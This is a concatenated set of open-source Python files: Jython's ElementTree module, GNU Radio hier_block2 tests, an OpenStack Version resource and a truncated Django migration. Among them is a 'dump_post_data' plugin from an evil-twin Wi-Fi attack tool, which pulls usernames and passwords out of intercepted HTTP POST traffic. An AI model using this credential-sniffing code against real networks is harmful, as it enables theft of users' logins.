prefix = namespaces.get(uri)
if prefix is None:
prefix = _namespace_map.get(uri)
if prefix is None:
prefix = "ns%d" % len(namespaces)
if prefix != "xml":
namespaces[uri] = prefix
if prefix:
qnames[qname] = encode("%s:%s" % (prefix, tag))
else:
qnames[qname] = encode(tag) # default element
else:
if default_namespace:
# FIXME: can this be handled in XML 1.0?
raise ValueError(
"cannot use non-qualified names with "
"default_namespace option"
)
qnames[qname] = encode(qname)
except TypeError:
_raise_serialization_error(qname)
# populate qname and namespaces table
try:
iterate = elem.iter
except AttributeError:
iterate = elem.getiterator # cET compatibility
for elem in iterate():
tag = elem.tag
if isinstance(tag, QName):
if tag.text not in qnames:
add_qname(tag.text)
elif isinstance(tag, basestring):
if tag not in qnames:
add_qname(tag)
elif tag is not None and tag is not Comment and tag is not PI:
_raise_serialization_error(tag)
for key, value in elem.items():
if isinstance(key, QName):
key = key.text
if key not in qnames:
add_qname(key)
if isinstance(value, QName) and value.text not in qnames:
add_qname(value.text)
text = elem.text
if isinstance(text, QName) and text.text not in qnames:
add_qname(text.text)
return qnames, namespaces
def _serialize_xml(write, elem, encoding, qnames, namespaces):
tag = elem.tag
text = elem.text
if tag is Comment:
write("<!--%s-->" % _encode(text, encoding))
elif tag is ProcessingInstruction:
write("<?%s?>" % _encode(text, encoding))
else:
tag = qnames[tag]
if tag is None:
if text:
write(_escape_cdata(text, encoding))
for e in elem:
_serialize_xml(write, e, encoding, qnames, None)
else:
write("<" + tag)
items = elem.items()
if items or namespaces:
if namespaces:
for v, k in sorted(namespaces.items(),
key=lambda x: x[1]): # sort on prefix
if k:
k = ":" + k
write(" xmlns%s=\"%s\"" % (
k.encode(encoding),
_escape_attrib(v, encoding)
))
for k, v in sorted(items): # lexical order
if isinstance(k, QName):
k = k.text
if isinstance(v, QName):
v = qnames[v.text]
else:
v = _escape_attrib(v, encoding)
write(" %s=\"%s\"" % (qnames[k], v))
if text or len(elem):
write(">")
if text:
write(_escape_cdata(text, encoding))
for e in elem:
_serialize_xml(write, e, encoding, qnames, None)
write("</" + tag + ">")
else:
write(" />")
if elem.tail:
write(_escape_cdata(elem.tail, encoding))
HTML_EMPTY = ("area", "base", "basefont", "br", "col", "frame", "hr",
"img", "input", "isindex", "link", "meta", "param")
try:
HTML_EMPTY = set(HTML_EMPTY)
except NameError:
pass
def _serialize_html(write, elem, encoding, qnames, namespaces):
tag = elem.tag
text = elem.text
if tag is Comment:
write("<!--%s-->" % _escape_cdata(text, encoding))
elif tag is ProcessingInstruction:
write("<?%s?>" % _escape_cdata(text, encoding))
else:
tag = qnames[tag]
if tag is None:
if text:
write(_escape_cdata(text, encoding))
for e in elem:
_serialize_html(write, e, encoding, qnames, None)
else:
write("<" + tag)
items = elem.items()
if items or namespaces:
if namespaces:
for v, k in sorted(namespaces.items(),
key=lambda x: x[1]): # sort on prefix
if k:
k = ":" + k
write(" xmlns%s=\"%s\"" % (
k.encode(encoding),
_escape_attrib(v, encoding)
))
for k, v in sorted(items): # lexical order
if isinstance(k, QName):
k = k.text
if isinstance(v, QName):
v = qnames[v.text]
else:
v = _escape_attrib_html(v, encoding)
# FIXME: handle boolean attributes
write(" %s=\"%s\"" % (qnames[k], v))
write(">")
ltag = tag.lower()
if text:
if ltag == "script" or ltag == "style":
write(_encode(text, encoding))
else:
write(_escape_cdata(text, encoding))
for e in elem:
_serialize_html(write, e, encoding, qnames, None)
if ltag not in HTML_EMPTY:
write("</" + tag + ">")
if elem.tail:
write(_escape_cdata(elem.tail, encoding))
def _serialize_text(write, elem, encoding):
for part in elem.itertext():
write(part.encode(encoding))
if elem.tail:
write(elem.tail.encode(encoding))
_serialize = {
"xml": _serialize_xml,
"html": _serialize_html,
"text": _serialize_text,
# this optional method is imported at the end of the module
# "c14n": _serialize_c14n,
}
##
# Registers a namespace prefix. The registry is global, and any
# existing mapping for either the given prefix or the namespace URI
# will be removed.
#
# @param prefix Namespace prefix.
# @param uri Namespace uri. Tags and attributes in this namespace
# will be serialized with the given prefix, if at all possible.
# @exception ValueError If the prefix is reserved, or is otherwise
# invalid.
def register_namespace(prefix, uri):
if re.match("ns\d+$", prefix):
raise ValueError("Prefix format reserved for internal use")
for k, v in _namespace_map.items():
if k == uri or v == prefix:
del _namespace_map[k]
_namespace_map[uri] = prefix
_namespace_map = {
# "well-known" namespace prefixes
"http://www.w3.org/XML/1998/namespace": "xml",
"http://www.w3.org/1999/xhtml": "html",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#": "rdf",
"http://schemas.xmlsoap.org/wsdl/": "wsdl",
# xml schema
"http://www.w3.org/2001/XMLSchema": "xs",
"http://www.w3.org/2001/XMLSchema-instance": "xsi",
# dublin core
"http://purl.org/dc/elements/1.1/": "dc",
}
def _raise_serialization_error(text):
raise TypeError(
"cannot serialize %r (type %s)" % (text, type(text).__name__)
)
def _encode(text, encoding):
try:
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_cdata(text, encoding):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 character, or so. assume that's, by far,
# the most common case in most applications.
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib(text, encoding):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
if "\n" in text:
text = text.replace("\n", " ")
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_html(text, encoding):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
##
# Generates a string representation of an XML element, including all
# subelements.
#
# @param element An Element instance.
# @keyparam encoding Optional output encoding (default is US-ASCII).
# @keyparam method Optional output method ("xml", "html", "text" or
# "c14n"; default is "xml").
# @return An encoded string containing the XML data.
# @defreturn string
def tostring(element, encoding=None, method=None):
class dummy:
pass
data = []
file = dummy()
file.write = data.append
ElementTree(element).write(file, encoding, method=method)
return "".join(data)
##
# Generates a string representation of an XML element, including all
# subelements. The string is returned as a sequence of string fragments.
#
# @param element An Element instance.
# @keyparam encoding Optional output encoding (default is US-ASCII).
# @keyparam method Optional output method ("xml", "html", "text" or
# "c14n"; default is "xml").
# @return A sequence object containing the XML data.
# @defreturn sequence
# @since 1.3
def tostringlist(element, encoding=None, method=None):
class dummy:
pass
data = []
file = dummy()
file.write = data.append
ElementTree(element).write(file, encoding, method=method)
# FIXME: merge small fragments into larger parts
return data
##
# Writes an element tree or element structure to sys.stdout. This
# function should be used for debugging only.
# <p>
# The exact output format is implementation dependent. In this
# version, it's written as an ordinary XML file.
#
# @param elem An element tree or an individual element.
def dump(elem):
# debugging
if not isinstance(elem, ElementTree):
elem = ElementTree(elem)
elem.write(sys.stdout)
tail = elem.getroot().tail
if not tail or tail[-1] != "\n":
sys.stdout.write("\n")
# --------------------------------------------------------------------
# parsing
##
# Parses an XML document into an element tree.
#
# @param source A filename or file object containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An ElementTree instance
def parse(source, parser=None):
tree = ElementTree()
tree.parse(source, parser)
return tree
##
# Parses an XML document into an element tree incrementally, and reports
# what's going on to the user.
#
# @param source A filename or file object containing XML data.
# @param events A list of events to report back. If omitted, only "end"
# events are reported.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return A (event, elem) iterator.
def iterparse(source, events=None, parser=None):
close_source = False
if not hasattr(source, "read"):
source = open(source, "rb")
close_source = True
try:
if not parser:
parser = XMLParser(target=TreeBuilder())
return _IterParseIterator(source, events, parser, close_source)
except:
if close_source:
source.close()
raise
class _IterParseIterator(object):
def __init__(self, source, events, parser, close_source=False):
self._file = source
self._close_file = close_source
self._events = []
self._index = 0
self._error = None
self.root = self._root = None
self._parser = parser
# wire up the parser for event reporting
parser = self._parser._parser
append = self._events.append
if events is None:
events = ["end"]
for event in events:
if event == "start":
try:
parser.ordered_attributes = 1
parser.specified_attributes = 1
def handler(tag, attrib_in, event=event, append=append,
start=self._parser._start_list):
append((event, start(tag, attrib_in)))
parser.StartElementHandler = handler
except AttributeError:
def handler(tag, attrib_in, event=event, append=append,
start=self._parser._start):
append((event, start(tag, attrib_in)))
parser.StartElementHandler = handler
elif event == "end":
def handler(tag, event=event, append=append,
end=self._parser._end):
append((event, end(tag)))
parser.EndElementHandler = handler
elif event == "start-ns":
def handler(prefix, uri, event=event, append=append):
try:
uri = (uri or "").encode("ascii")
except UnicodeError:
pass
append((event, (prefix or "", uri or "")))
parser.StartNamespaceDeclHandler = handler
elif event == "end-ns":
def handler(prefix, event=event, append=append):
append((event, None))
parser.EndNamespaceDeclHandler = handler
else:
raise ValueError("unknown event %r" % event)
def next(self):
try:
while 1:
try:
item = self._events[self._index]
self._index += 1
return item
except IndexError:
pass
if self._error:
e = self._error
self._error = None
raise e
if self._parser is None:
self.root = self._root
break
# load event buffer
del self._events[:]
self._index = 0
data = self._file.read(16384)
if data:
try:
self._parser.feed(data)
except SyntaxError as exc:
self._error = exc
else:
self._root = self._parser.close()
self._parser = None
except:
if self._close_file:
self._file.close()
raise
if self._close_file:
self._file.close()
raise StopIteration
def __iter__(self):
return self
##
# Parses an XML document from a string constant. This function can
# be used to embed "XML literals" in Python code.
#
# @param source A string containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An Element instance.
# @defreturn Element
def XML(text, parser=None):
if not parser:
parser = XMLParser(target=TreeBuilder())
parser.feed(text)
return parser.close()
##
# Parses an XML document from a string constant, and also returns
# a dictionary which maps from element id:s to elements.
#
# @param source A string containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return A tuple containing an Element instance and a dictionary.
# @defreturn (Element, dictionary)
def XMLID(text, parser=None):
if not parser:
parser = XMLParser(target=TreeBuilder())
parser.feed(text)
tree = parser.close()
ids = {}
for elem in tree.iter():
id = elem.get("id")
if id:
ids[id] = elem
return tree, ids
##
# Parses an XML document from a string constant. Same as {@link #XML}.
#
# @def fromstring(text)
# @param source A string containing XML data.
# @return An Element instance.
# @defreturn Element
fromstring = XML
##
# Parses an XML document from a sequence of string fragments.
#
# @param sequence A list or other sequence containing XML data fragments.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An Element instance.
# @defreturn Element
# @since 1.3
def fromstringlist(sequence, parser=None):
if not parser:
parser = XMLParser(target=TreeBuilder())
for text in sequence:
parser.feed(text)
return parser.close()
# --------------------------------------------------------------------
##
# Generic element structure builder. This builder converts a sequence
# of {@link #TreeBuilder.start}, {@link #TreeBuilder.data}, and {@link
# #TreeBuilder.end} method calls to a well-formed element structure.
# <p>
# You can use this class to build an element structure using a custom XML
# parser, or a parser for some other XML-like format.
#
# @param element_factory Optional element factory. This factory
# is called to create new Element instances, as necessary.
class TreeBuilder(object):
def __init__(self, element_factory=None):
self._data = [] # data collector
self._elem = [] # element stack
self._last = None # last element
self._tail = None # true if we're after an end tag
if element_factory is None:
element_factory = Element
self._factory = element_factory
##
# Flushes the builder buffers, and returns the toplevel document
# element.
#
# @return An Element instance.
# @defreturn Element
def close(self):
assert len(self._elem) == 0, "missing end tags"
assert self._last is not None, "missing toplevel element"
return self._last
def _flush(self):
if self._data:
if self._last is not None:
text = "".join(self._data)
if self._tail:
assert self._last.tail is None, "internal error (tail)"
self._last.tail = text
else:
assert self._last.text is None, "internal error (text)"
self._last.text = text
self._data = []
##
# Adds text to the current element.
#
# @param data A string. This should be either an 8-bit string
# containing ASCII text, or a Unicode string.
def data(self, data):
self._data.append(data)
##
# Opens a new element.
#
# @param tag The element name.
# @param attrib A dictionary containing element attributes.
# @return The opened element.
# @defreturn Element
def start(self, tag, attrs):
self._flush()
self._last = elem = self._factory(tag, attrs)
if self._elem:
self._elem[-1].append(elem)
self._elem.append(elem)
self._tail = 0
return elem
##
# Closes the current element.
#
# @param tag The element name.
# @return The closed element.
# @defreturn Element
def end(self, tag):
self._flush()
self._last = self._elem.pop()
assert self._last.tag == tag,\
"end tag mismatch (expected %s, got %s)" % (
self._last.tag, tag)
self._tail = 1
return self._last
##
# Element structure builder for XML source data, based on the
# <b>expat</b> parser.
#
# @keyparam target Target object. If omitted, the builder uses an
# instance of the standard {@link #TreeBuilder} class.
# @keyparam html Predefine HTML entities. This flag is not supported
# by the current implementation.
# @keyparam encoding Optional encoding. If given, the value overrides
# the encoding specified in the XML file.
# @see #ElementTree
# @see #TreeBuilder
class XMLParser(object):
def __init__(self, html=0, target=None, encoding=None):
try:
from xml.parsers import expat
except ImportError:
try:
import pyexpat as expat
except ImportError:
raise ImportError(
"No module named expat; use SimpleXMLTreeBuilder instead"
)
parser = expat.ParserCreate(encoding, "}")
if target is None:
target = TreeBuilder()
# underscored names are provided for compatibility only
self.parser = self._parser = parser
self.target = self._target = target
self._error = expat.error
self._names = {} # name memo cache
# callbacks
parser.DefaultHandlerExpand = self._default
parser.StartElementHandler = self._start
parser.EndElementHandler = self._end
parser.CharacterDataHandler = self._data
# optional callbacks
parser.CommentHandler = self._comment
parser.ProcessingInstructionHandler = self._pi
# let expat do the buffering, if supported
try:
self._parser.buffer_text = 1
except AttributeError:
pass
# use new-style attribute handling, if supported
try:
self._parser.ordered_attributes = 1
self._parser.specified_attributes = 1
parser.StartElementHandler = self._start_list
except AttributeError:
pass
self._doctype = None
self.entity = {}
try:
self.version = "Expat %d.%d.%d" % expat.version_info
except AttributeError:
pass # unknown
def _raiseerror(self, value):
err = ParseError(value)
err.code = value.code
err.position = value.lineno, value.offset
raise err
def _fixtext(self, text):
# convert text string to ascii, if possible
try:
return text.encode("ascii")
except UnicodeError:
return text
def _fixname(self, key):
# expand qname, and convert name string to ascii, if possible
try:
name = self._names[key]
except KeyError:
name = key
if "}" in name:
name = "{" + name
self._names[key] = name = self._fixtext(name)
return name
def _start(self, tag, attrib_in):
fixname = self._fixname
fixtext = self._fixtext
tag = fixname(tag)
attrib = {}
for key, value in attrib_in.items():
attrib[fixname(key)] = fixtext(value)
return self.target.start(tag, attrib)
def _start_list(self, tag, attrib_in):
fixname = self._fixname
fixtext = self._fixtext
tag = fixname(tag)
attrib = {}
if attrib_in:
for i in range(0, len(attrib_in), 2):
attrib[fixname(attrib_in[i])] = fixtext(attrib_in[i+1])
return self.target.start(tag, attrib)
def _data(self, text):
return self.target.data(self._fixtext(text))
def _end(self, tag):
return self.target.end(self._fixname(tag))
def _comment(self, data):
try:
comment = self.target.comment
except AttributeError:
pass
else:
return comment(self._fixtext(data))
def _pi(self, target, data):
try:
pi = self.target.pi
except AttributeError:
pass
else:
return pi(self._fixtext(target), self._fixtext(data))
def _default(self, text):
prefix = text[:1]
if prefix == "&":
# deal with undefined entities
try:
self.target.data(self.entity[text[1:-1]])
except KeyError:
from xml.parsers import expat
err = expat.error(
"undefined entity %s: line %d, column %d" %
(text, self._parser.ErrorLineNumber,
self._parser.ErrorColumnNumber)
)
err.code = 11 # XML_ERROR_UNDEFINED_ENTITY
err.lineno = self._parser.ErrorLineNumber
err.offset = self._parser.ErrorColumnNumber
raise err
elif prefix == "<" and text[:9] == "<!DOCTYPE":
self._doctype = [] # inside a doctype declaration
elif self._doctype is not None:
# parse doctype contents
if prefix == ">":
self._doctype = None
return
text = text.strip()
if not text:
return
self._doctype.append(text)
n = len(self._doctype)
if n > 2:
type = self._doctype[1]
if type == "PUBLIC" and n == 4:
name, type, pubid, system = self._doctype
elif type == "SYSTEM" and n == 3:
name, type, system = self._doctype
pubid = None
else:
return
if pubid:
pubid = pubid[1:-1]
if hasattr(self.target, "doctype"):
self.target.doctype(name, pubid, system[1:-1])
elif self.doctype is not self._XMLParser__doctype:
# warn about deprecated call
self._XMLParser__doctype(name, pubid, system[1:-1])
self.doctype(name, pubid, system[1:-1])
self._doctype = None
##
# (Deprecated) Handles a doctype declaration.
#
# @param name Doctype name.
# @param pubid Public identifier.
# @param system System identifier.
def doctype(self, name, pubid, system):
"""This method of XMLParser is deprecated."""
warnings.warn(
"This method of XMLParser is deprecated. Define doctype() "
"method on the TreeBuilder target.",
DeprecationWarning,
)
# sentinel, if doctype is redefined in a subclass
__doctype = doctype
##
# Feeds data to the parser.
#
# @param data Encoded data.
def feed(self, data):
try:
self._parser.Parse(data, 0)
except self._error, v:
self._raiseerror(v)
##
# Finishes feeding data to the parser.
#
# @return An element structure.
# @defreturn Element
def close(self):
try:
self._parser.Parse("", 1) # end of data
except self._error, v:
self._raiseerror(v)
tree = self.target.close()
del self.target, self._parser # get rid of circular references
return tree
# compatibility
XMLTreeBuilder = XMLParser
# workaround circular import.
try:
from ElementC14N import _serialize_c14n
_serialize["c14n"] = _serialize_c14n
except ImportError:
pass
| bikashgupta11/javarobot | src/main/resources/jython/Lib/xml/etree/ElementTree.py | Python | gpl-3.0 | 56,932 |
from plugins.extension.plugin import PluginTemplate
from mitmproxy.models import decoded
from PyQt4.QtCore import QObject,pyqtSignal
import re
"""
Description:
This program is a core for wifi-pumpkin.py. file which includes functionality
plugins for Pumpkin-Proxy.
Copyright:
Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
class dump_post_data(PluginTemplate):
meta = {
'Name' : 'dump_post_data',
'Version' : '1.0',
'Description' : 'Getting HTTP post data capture login post and logout pre event hook and its its working in web',
'Author' : 'Marcos Nesster'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = False
def get_password_POST(self, content):
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, content, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, content, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def request(self, flow):
self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
self.send_output.emit( 'HTTP username: %s' % http_user)
self.send_output.emit( 'HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
def response(self, flow):
pass | P0cL4bs/3vilTwinAttacker | plugins/extension/dump_post_data.py | Python | gpl-3.0 | 4,003 |
#
# Copyright 2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import time
from gnuradio import gr_unittest, blocks, gr, analog
from gnuradio.gr.hier_block2 import _multiple_endpoints, _optional_endpoints
import pmt
class test_hblk(gr.hier_block2):
def __init__(self, io_sig=1*[gr.sizeof_gr_complex], ndebug=2):
# parent constructor
gr.hier_block2.__init__(self,
"test_hblk",
gr.io_signature(len(io_sig), len(io_sig), io_sig[0]),
gr.io_signature(0,0,0))
self.message_port_register_hier_in("msg_in");
# Internal Stream Blocks
self.vsnk = blocks.vector_sink_c()
# Internal Msg Blocks
self.blks = [];
for i in range(0, ndebug):
self.blks.append( blocks.message_debug() )
# Set up internal connections
self.connect( self, self.vsnk )
for blk in self.blks:
self.msg_connect( self, "msg_in", blk, "print" )
class test_hier_block2(gr_unittest.TestCase):
def setUp(self):
self.call_log = []
self.Block = type("Block", (), {"to_basic_block": lambda bl: bl})
def test_f(self, *args):
"""test doc"""
self.call_log.append(args)
multi = _multiple_endpoints(test_f)
opt = _optional_endpoints(test_f)
def test_000(self):
self.assertEqual(self.multi.__doc__, "test doc")
self.assertEqual(self.multi.__name__, "test_f")
def test_001(self):
b = self.Block()
self.multi(b)
self.assertEqual((b,), self.call_log[0])
def test_002(self):
b1, b2 = self.Block(), self.Block()
self.multi(b1, b2)
self.assertEqual([(b1, 0, b2, 0)], self.call_log)
def test_003(self):
b1, b2 = self.Block(), self.Block()
self.multi((b1, 1), (b2, 2))
self.assertEqual([(b1, 1, b2, 2)], self.call_log)
def test_004(self):
b1, b2, b3, b4 = [self.Block()] * 4
self.multi(b1, (b2, 5), b3, (b4, 0))
expected = [
(b1, 0, b2, 5),
(b2, 5, b3, 0),
(b3, 0, b4, 0),
]
self.assertEqual(expected, self.call_log)
def test_005(self):
with self.assertRaises(ValueError):
self.multi((self.Block(), 5))
def test_006(self):
with self.assertRaises(ValueError):
self.multi(self.Block(), (5, 5))
def test_007(self):
b1, b2 = self.Block(), self.Block()
self.opt(b1, "in", b2, "out")
self.assertEqual([(b1, "in", b2, "out")], self.call_log)
def test_008(self):
f, b1, b2 = self.multi, self.Block(), self.Block()
self.opt((b1, "in"), (b2, "out"))
self.assertEqual([(b1, "in", b2, "out")], self.call_log)
def test_009(self):
with self.assertRaises(ValueError):
self.multi(self.Block(), 5)
def test_010(self):
s, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 0)
tb = gr.top_block()
tb.connect(s,h,k)
tb.run()
def test_011(self):
s, st, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.message_strobe(pmt.PMT_NIL, 100), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 1)
tb = gr.top_block()
tb.connect(s,h,k)
tb.msg_connect(st,"strobe",k,"msg_in")
tb.start()
time.sleep(1)
tb.stop()
tb.wait()
def test_012(self):
s, st, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.message_strobe(pmt.PMT_NIL, 100), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 16)
tb = gr.top_block()
tb.connect(s,h,k)
tb.msg_connect(st,"strobe",k,"msg_in")
tb.start()
time.sleep(1)
tb.stop()
tb.wait()
if __name__ == '__main__':
gr_unittest.run(test_hier_block2, "test_hier_block2.xml")
| jdemel/gnuradio | gnuradio-runtime/python/gnuradio/gr/qa_hier_block2.py | Python | gpl-3.0 | 4,084 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class Version(resource.Resource):
resource_key = 'version'
resources_key = 'versions'
base_path = '/'
# capabilities
allow_list = True
# Properties
media_types = resource.Body('media-types')
status = resource.Body('status')
updated = resource.Body('updated')
@classmethod
def list(cls, session, paginated=False, base_path=None, **params):
if base_path is None:
base_path = cls.base_path
resp = session.get(base_path,
params=params)
resp = resp.json()
for data in resp[cls.resources_key]['values']:
yield cls.existing(**data)
| ctrlaltdel/neutrinator | vendor/openstack/identity/version.py | Python | gpl-3.0 | 1,236 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import easy_thumbnails.fields
from django.conf import settings
import zds.utils.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Alert',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('scope', models.CharField(db_index=True, max_length=1, choices=[(b'A', b"Commentaire d'article"), (b'F', b'Forum'), (b'T', b'Commentaire de tuto')])),
('text', models.TextField(verbose_name=b"Texte d'alerte")),
('pubdate', models.DateTimeField(verbose_name=b'Date de publication', db_index=True)),
('author', models.ForeignKey(related_name='alerts', verbose_name=b'Auteur', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Alerte',
'verbose_name_plural': 'Alertes',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=80, verbose_name=b'Titre')),
('description', models.TextField(verbose_name=b'Description')),
('position', models.IntegerField(default=0, verbose_name=b'Position')),
('slug', models.SlugField(max_length=80)),
],
options={
'verbose_name': 'Categorie',
'verbose_name_plural': 'Categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CategorySubCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_main', models.BooleanField(default=True, db_index=True, verbose_name=b'Est la cat\xc3\xa9gorie principale')),
('category', models.ForeignKey(verbose_name=b'Cat\xc3\xa9gorie', to='utils.Category')),
],
options={
'verbose_name': 'Hierarchie cat\xe9gorie',
'verbose_name_plural': 'Hierarchies cat\xe9gories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ip_address', models.CharField(max_length=39, verbose_name=b"Adresse IP de l'auteur ")),
('position', models.IntegerField(verbose_name=b'Position', db_index=True)),
('text', models.TextField(verbose_name=b'Texte')),
('text_html', models.TextField(verbose_name=b'Texte en Html')),
('like', models.IntegerField(default=0, verbose_name=b'Likes')),
('dislike', models.IntegerField(default=0, verbose_name=b'Dislikes')),
('pubdate', models.DateTimeField(auto_now_add=True, verbose_name=b'Date de publication', db_index=True)),
('update', models.DateTimeField(null=True, verbose_name=b"Date d'\xc3\xa9dition", blank=True)),
('is_visible', models.BooleanField(default=True, verbose_name=b'Est visible')),
('text_hidden', models.CharField(default=b'', max_length=80, verbose_name=b'Texte de masquage ')),
('author', models.ForeignKey(related_name='comments', verbose_name=b'Auteur', to=settings.AUTH_USER_MODEL)),
('editor', models.ForeignKey(related_name='comments-editor', verbose_name=b'Editeur', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'verbose_name': 'Commentaire',
'verbose_name_plural': 'Commentaires',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommentDislike',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('comments', models.ForeignKey(to='utils.Comment')),
('user', models.ForeignKey(related_name='post_disliked', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Ce message est inutile',
'verbose_name_plural': 'Ces messages sont inutiles',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommentLike',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('comments', models.ForeignKey(to='utils.Comment')),
('user', models.ForeignKey(related_name='post_liked', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Ce message est utile',
'verbose_name_plural': 'Ces messages sont utiles',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HelpWriting',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20, verbose_name=b'Name')),
('slug', models.SlugField(max_length=20)),
('tablelabel', models.CharField(max_length=150, verbose_name=b'TableLabel')),
('image', easy_thumbnails.fields.ThumbnailerImageField(upload_to=zds.utils.models.image_path_help)),
],
options={
'verbose_name': 'Aide \xe0 la r\xe9daction',
'verbose_name_plural': 'Aides \xe0 la r\xe9daction',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Licence',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('code', models.CharField(max_length=20, verbose_name=b'Code')),
('title', models.CharField(max_length=80, verbose_name=b'Titre')),
('description', models.TextField(verbose_name=b'Description')),
],
options={
'verbose_name': 'Licence',
'verbose_name_plural': 'Licences',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SubCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=80, verbose_name=b'Titre')),
('subtitle', models.CharField(max_length=200, verbose_name=b'Sous-titre')),
